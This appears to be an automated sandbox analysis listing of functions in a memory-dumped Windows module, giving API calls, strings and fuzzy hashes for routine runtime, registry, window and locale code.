Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 0d66de3ba636428ef205fddd4b7fb75eace5514813cee084a1e5f173e66ac422
Instruction ID: fee09744577cf1445d4c358263c5cde60ee117421db0390a382051cc4e18262b
Opcode Fuzzy Hash: 0d66de3ba636428ef205fddd4b7fb75eace5514813cee084a1e5f173e66ac422
Instruction Fuzzy Hash: 6141C130A04259DBCF00EFA9C880A9EBBB9AF8571CF148555EC15AB391D735DA06CF93

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C8680, Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,7BDA3107,?,00000000,?,00000000,8007000E), ref: 6E9C86F3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6E9C872A

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 7317bb0c7b89b0cdc02d33fbe0022ae96d3088b179cdb67e2c84dee699df6422
Instruction ID: 81bd7f376b2627d87f2f68997ea35d7e4dd0a4093ed10c19f3744fe2392984cf
Opcode Fuzzy Hash: 7317bb0c7b89b0cdc02d33fbe0022ae96d3088b179cdb67e2c84dee699df6422
Instruction Fuzzy Hash: 0F3128B2604309ABD724AFA49C45FAA77BCEF40F10F100529FA05E6280E772F5008EA7

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C3380, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,00000024,00000000), ref: 6E9C3410
GetWindowLongW.USER32(?,000000FC), ref: 6E9C3424
CallWindowProcW.USER32(?,?,00000082,00000024,00000000), ref: 6E9C343A
GetWindowLongW.USER32(?,000000FC), ref: 6E9C3453
SetWindowLongW.USER32 ref: 6E9C3462

Strings

$, xrefs: 6E9C33C4

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 86b89107b382b036b1f1b40e01f687aa9ae1043836bf34d43de096f76fde595d
Instruction ID: 51275e695d459b3a195704d125621c03c847ac57fb3d59baeab50c1761eeec15
Opcode Fuzzy Hash: 86b89107b382b036b1f1b40e01f687aa9ae1043836bf34d43de096f76fde595d
Instruction Fuzzy Hash: 62412871900709AFCB21DFA9C884A9EBBF5FF48710F108A5DE956A7260D731E904CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BE440, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,7BDA3107), ref: 6E9BE494
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6E9BE4AB
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,7BDA3107), ref: 6E9BE4E0
RegCloseKey.ADVAPI32(00000000), ref: 6E9BE4F3

Strings

RegOpenKeyTransactedW, xrefs: 6E9BE4A5
Advapi32.dll, xrefs: 6E9BE48F

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: 3a5a56753f41205df60767b10063879f7c615def23e8436fe773c3c98b8d3d82
Instruction ID: efc180b2ae6d8692eb439f9a8940c706dc3851307a9ad770d3ff591b6ef6ad01
Opcode Fuzzy Hash: 3a5a56753f41205df60767b10063879f7c615def23e8436fe773c3c98b8d3d82
Instruction Fuzzy Hash: C63150B1A0460AAFDB24CF95C844BABB7BDEF45710F108569F915AB344E734E900CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B8BF0, Relevance: 10.6, APIs: 7, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6E9B8C21
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E9B8C2F
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6E9B8C44
SysFreeString.OLEAUT32(00000000), ref: 6E9B8C4F
VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 6E9B8C76
SysFreeString.OLEAUT32(00000000), ref: 6E9B8C83
SysFreeString.OLEAUT32 ref: 6E9B8CB2

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr
String ID:
API String ID: 1801994256-0
Opcode ID: bfc4e4f1896e08572e8939e959e35655632f65be72e2b6f14a6539cada841a18
Instruction ID: 59cbf40de8af7b387449ae9d1bd018822485fba9e41a71952baf49b56c4377dc
Opcode Fuzzy Hash: bfc4e4f1896e08572e8939e959e35655632f65be72e2b6f14a6539cada841a18
Instruction Fuzzy Hash: 241102B1649716BBCB355AA48C49F9F7B78EF46B20F200265FA11AA2C4DB7099048B90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DDFA3, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 6E9DDFF9
ext-ms-, xrefs: 6E9DE00D

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: a748556f0592b155128f9b71054b3be977e0a93e4eb0fb3819d52cce9a7164ec
Instruction ID: 5c050bc1beee9e22b36aed4b6e31ac13219cbc06a89c9109bff1f2c8bf9bd68e
Opcode Fuzzy Hash: a748556f0592b155128f9b71054b3be977e0a93e4eb0fb3819d52cce9a7164ec
Instruction Fuzzy Hash: D721F9B1D49E39EBC7714AE9CC80B6AB76C9F46760F118510ED15A7284E630E809CEE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B21F0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E9B221D

Part of subcall function 6E9C94A7: RaiseException.KERNEL32(?,?,6E9C6476,000000FF,00000000,00000000,24448D6E,?,?,?,?,6E9C6476,000000FF,6E9FCD2C,?,000000FF), ref: 6E9C9507

__CxxThrowException@8.LIBVCRUNTIME ref: 6E9B2262
___std_exception_copy.LIBVCRUNTIME ref: 6E9B228F

Strings

ios_base::badbit set, xrefs: 6E9B2227, 6E9B2252, 6E9B2273
ios_base::failbit set, xrefs: 6E9B2135, 6E9B2231
ios_base::eofbit set, xrefs: 6E9B2236

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3941765731-1866435925
Opcode ID: 35ab521b2e8462678a5a70de3faa2fef05ec850c5a8f05de1d196b6f9d865e40
Instruction ID: 1337f0cd208d5bfc79ac59209c9cb9d093aa801beff604989fb9911d13a220c2
Opcode Fuzzy Hash: 35ab521b2e8462678a5a70de3faa2fef05ec850c5a8f05de1d196b6f9d865e40
Instruction Fuzzy Hash: 8A11D2B2910305AFC714DFE9D801BC6B3ECEF55224F048A1AFA68DB640E771E5558FA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E4EB6, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6E9E4BFD: _free.LIBCMT ref: 6E9E4C26

_free.LIBCMT ref: 6E9E4F04

Part of subcall function 6E9D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BAE
Part of subcall function 6E9D9B98: GetLastError.KERNEL32(6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BC0

_free.LIBCMT ref: 6E9E4F0F
_free.LIBCMT ref: 6E9E4F1A
_free.LIBCMT ref: 6E9E4F6E
_free.LIBCMT ref: 6E9E4F79
_free.LIBCMT ref: 6E9E4F84
_free.LIBCMT ref: 6E9E4F8F

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction ID: 7916754d6476baa8babbdbee25ccf26e6fa07279ead5f9d1c3d2c033000d0c13
Opcode Fuzzy Hash: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction Fuzzy Hash: B9115171950F18BAD622ABF0CC05FDF779C6FA0708F444C15A39EA6450DB79F50A8E50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DF447, Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E9CE12A,6E9CE12A,?,?,?,6E9DF698,00000001,00000001,F9E85006), ref: 6E9DF4A1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E9DF698,00000001,00000001,F9E85006,?,?,?), ref: 6E9DF527
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F9E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E9DF621
__freea.LIBCMT ref: 6E9DF62E

Part of subcall function 6E9D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E9C8F9C,00000105,000000FF,24448D6E,00000000,?,6E9B1687,?,00000103,000000FF), ref: 6E9D9C04

__freea.LIBCMT ref: 6E9DF637
__freea.LIBCMT ref: 6E9DF65C

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: cf573bcc8cd6a3cc4167a089c55625a8e579116684ae2a2100661bb2d6ac99b5
Instruction ID: 74a8fec480b2849e9a20cf1f381c1ad01ec14f16d8a8b3d5b4b9e8d1641fdf48
Opcode Fuzzy Hash: cf573bcc8cd6a3cc4167a089c55625a8e579116684ae2a2100661bb2d6ac99b5
Instruction Fuzzy Hash: D1513972600A2AAFEB158EE4CC42EAF77ADEF40758F258628FD14D6150EB34DC48CE50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C1810, Relevance: 9.2, APIs: 6, Instructions: 196threadCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 6E9C18BE

Part of subcall function 6E9C34B0: EnterCriticalSection.KERNEL32(6E9FFAA4,?,?), ref: 6E9C34FA
Part of subcall function 6E9C34B0: GetClassInfoExW.USER32 ref: 6E9C352D
Part of subcall function 6E9C34B0: GetClassInfoExW.USER32 ref: 6E9C3544
Part of subcall function 6E9C34B0: LeaveCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C3553

Part of subcall function 6E9C8508: GetProcessHeap.KERNEL32(00000008,00000008,00000000,6E9C3342), ref: 6E9C850D
Part of subcall function 6E9C8508: HeapAlloc.KERNEL32(00000000), ref: 6E9C8514

SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,6E9E9D70,000000FF), ref: 6E9C1909
GetCurrentThreadId.KERNEL32 ref: 6E9C19AE
EnterCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C19BC
LeaveCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C19D5
CreateWindowExW.USER32 ref: 6E9C1A0B

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ClassEnterHeapInfoLeave$AllocClientCreateCurrentErrorLastProcessRectThreadWindow
String ID:
API String ID: 859899439-0
Opcode ID: d6e5e7c04787d9c5820573aaf4717f6af0b80b75afeb4b6f57782d648d2720cb
Instruction ID: 9768735a593522141bbb3b75c03f862a6c8e1130556cca9aa7c1ff711df56ffe
Opcode Fuzzy Hash: d6e5e7c04787d9c5820573aaf4717f6af0b80b75afeb4b6f57782d648d2720cb
Instruction Fuzzy Hash: 046181B1A00609EFDB14DFA9D844BAEB7B8EF49714F108119E915AB344E730E904CF96

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BEEB0, Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,7BDA3107,00000000,00000000), ref: 6E9BEEEE
CharNextW.USER32(00000000,?,?,00000000), ref: 6E9BEF1B
CharNextW.USER32(7691EEF0,?,?,00000000), ref: 6E9BEF34
CharNextW.USER32(7691EEF0,?,?,00000000), ref: 6E9BEF3F
CharNextW.USER32(00000001,?,?,00000000), ref: 6E9BEFAE

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 9af68f5ce9688de898f7e37fc443d7140f16097de19546e364d03e1fa935a4ae
Instruction ID: dd1efce564a84223f5f301c200bcabd46778fe75614434901cb2f82218f2b56e
Opcode Fuzzy Hash: 9af68f5ce9688de898f7e37fc443d7140f16097de19546e364d03e1fa935a4ae
Instruction Fuzzy Hash: 8141E879A1421ACFCB10DFA9C88056BB7FAEF99315B6044A6E449C7358E731D982CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B4460, Relevance: 9.1, APIs: 6, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E9B44A9
std::_Lockit::_Lockit.LIBCPMT ref: 6E9B44CB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B44EB
__Getctype.LIBCPMT ref: 6E9B4587
std::_Facet_Register.LIBCPMT ref: 6E9B45A6
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B45C6

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 180e9d7922a95b76a6a776ab65b514fbe43bc46b8d0cf2de2ee392ebe0a4ca1d
Instruction ID: 21772af636e597f8ee93452ec8fc467f4d3870c3c076210ba1da76b20ae371b2
Opcode Fuzzy Hash: 180e9d7922a95b76a6a776ab65b514fbe43bc46b8d0cf2de2ee392ebe0a4ca1d
Instruction Fuzzy Hash: 97518F719047049FCB11DF98C480A9FB7B8EF55B18F14856DD809AB281EB70E946CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BE530, Relevance: 9.1, APIs: 6, Instructions: 121registryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E9BE440: GetModuleHandleW.KERNEL32(Advapi32.dll,7BDA3107), ref: 6E9BE494
Part of subcall function 6E9BE440: RegCloseKey.ADVAPI32(00000000), ref: 6E9BE4F3

RegCloseKey.ADVAPI32(?,?,?), ref: 6E9BE592
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 6E9BE5DA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 6E9BE613
RegCloseKey.ADVAPI32(?), ref: 6E9BE628
RegCloseKey.ADVAPI32(?), ref: 6E9BE650
RegCloseKey.ADVAPI32(?), ref: 6E9BE678

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Enum$HandleModule
String ID:
API String ID: 2852649468-0
Opcode ID: 1b6f06455a3adb6166415cf621e1c2fb6091a4b91a06b9ca71cda5f6ad10613a
Instruction ID: 65ac4809a88e6c9a4bf986871e1594dacfc09bb50b4fb12b1a38c411a1352164
Opcode Fuzzy Hash: 1b6f06455a3adb6166415cf621e1c2fb6091a4b91a06b9ca71cda5f6ad10613a
Instruction Fuzzy Hash: EC412EB22083059BD724DFA5D854BABB7ECEF88355F00496EF955D7240EB70E9048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9CB2A1, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6E9C92CF,6E9C4EA0,6E9C5531,?,6E9C574E,?,00000001,?,?,00000001,?,6E9FCC28,0000000C,6E9C5842), ref: 6E9CB2AF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E9CB2BD
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E9CB2D6
SetLastError.KERNEL32(00000000,6E9C574E,?,00000001,?,?,00000001,?,6E9FCC28,0000000C,6E9C5842,?,00000001,?), ref: 6E9CB328

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3030641a030e93dae348994829324dc74d5bb71820d29c28ca1a0c6441d225c3
Instruction ID: 378a5c2bd7b180b7156db08c0b3fe8e168be7184765d96991afb97aa21960294
Opcode Fuzzy Hash: 3030641a030e93dae348994829324dc74d5bb71820d29c28ca1a0c6441d225c3
Instruction Fuzzy Hash: E001F57211D7125EA66035F57C9466A3A6CEF52EBDB200A2AF924492D8FF11C8028D47

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C6698, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E9C669F
std::_Lockit::_Lockit.LIBCPMT ref: 6E9C66A9

Part of subcall function 6E9B19B0: std::_Lockit::_Lockit.LIBCPMT ref: 6E9B19CD
Part of subcall function 6E9B19B0: std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B19E9

codecvt.LIBCPMT ref: 6E9C66E3
std::_Facet_Register.LIBCPMT ref: 6E9C66FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9C671A
__CxxThrowException@8.LIBVCRUNTIME ref: 6E9C6738

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: 38bbb37ef6fbff882d90512888fed8bc67e21a91ee3a352bc9149f968ef13284
Instruction ID: f73d4f14357232f0a41f642717663dd924399ddb4a5a3ccff43c097374d22fbb
Opcode Fuzzy Hash: 38bbb37ef6fbff882d90512888fed8bc67e21a91ee3a352bc9149f968ef13284
Instruction Fuzzy Hash: 19119E729102199BCF05EBE0C894AFE77B9AFA5B18F140909D5116B290DF34DA45CF93

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B91C0, Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6E9B9563
_com_issue_error.COMSUPP ref: 6E9B956D
_com_issue_error.COMSUPP ref: 6E9B9577
_com_issue_error.COMSUPP ref: 6E9B957D
_com_issue_error.COMSUPP ref: 6E9B9587
_com_issue_error.COMSUPP ref: 6E9B9591

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error
String ID:
API String ID: 2162355165-0
Opcode ID: cb2f8c3e6c4ace32718b57499ce84c23856e1e7e2433ebda383d88ed640ed4cb
Instruction ID: 48da31ed570afcaf01f549cfa6bc0b8d8f3f61584df39c24a99cc910d9525578
Opcode Fuzzy Hash: cb2f8c3e6c4ace32718b57499ce84c23856e1e7e2433ebda383d88ed640ed4cb
Instruction Fuzzy Hash: D6F096F550018DAEE715AFE48900F9F77ACEF50A18F10052CAE147A244C730B500CA5F

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C1390, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 6E9BBC70: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,7BDA3107,00000000,?), ref: 6E9BBCDE

ShellExecuteW.SHELL32(00000000,edit,?,00000000,00000000,00000001), ref: 6E9C13E7
PdhRemoveCounter.PDH(?,?,00000000), ref: 6E9C1483
PdhCloseQuery.PDH(?,?,00000000), ref: 6E9C1498

Strings

edit, xrefs: 6E9C13E0
0, xrefs: 6E9C1547

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCounterExecuteFolderPathQueryRemoveShell
String ID: 0$edit
API String ID: 2809573910-562573004
Opcode ID: edf7ad4181c1d7a203f4d112cef42ee393e359686c1bd7f5f58da19f8576a526
Instruction ID: 6c3bb3ad63291695b01d17b36c44fcb04d017e51d0845935f1147d51a836dce9
Opcode Fuzzy Hash: edf7ad4181c1d7a203f4d112cef42ee393e359686c1bd7f5f58da19f8576a526
Instruction Fuzzy Hash: 66A1F2716003068BD704EF69C990B9AB7B9BF86718F104A1CE9558B291D731F988CFD7

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DD00E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9DD196

Strings

*?, xrefs: 6E9DD04F
., xrefs: 6E9DD39F

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?$.
API String ID: 269201875-3972193922
Opcode ID: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction ID: 69ed4060a7730b308261a698dc175966bc162850c351185dd83203d50e7e09d2
Opcode Fuzzy Hash: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction Fuzzy Hash: CC613BB5D14619AFDB04CFE8C8808EDFBF9EF88310B14866AD855A7304D771EA458F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B2120, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E9B221D

Part of subcall function 6E9C94A7: RaiseException.KERNEL32(?,?,6E9C6476,000000FF,00000000,00000000,24448D6E,?,?,?,?,6E9C6476,000000FF,6E9FCD2C,?,000000FF), ref: 6E9C9507

__CxxThrowException@8.LIBVCRUNTIME ref: 6E9B2262
___std_exception_copy.LIBVCRUNTIME ref: 6E9B228F

Strings

ios_base::badbit set, xrefs: 6E9B2227, 6E9B2252, 6E9B2273
ios_base::failbit set, xrefs: 6E9B2135

Memory Dump Source

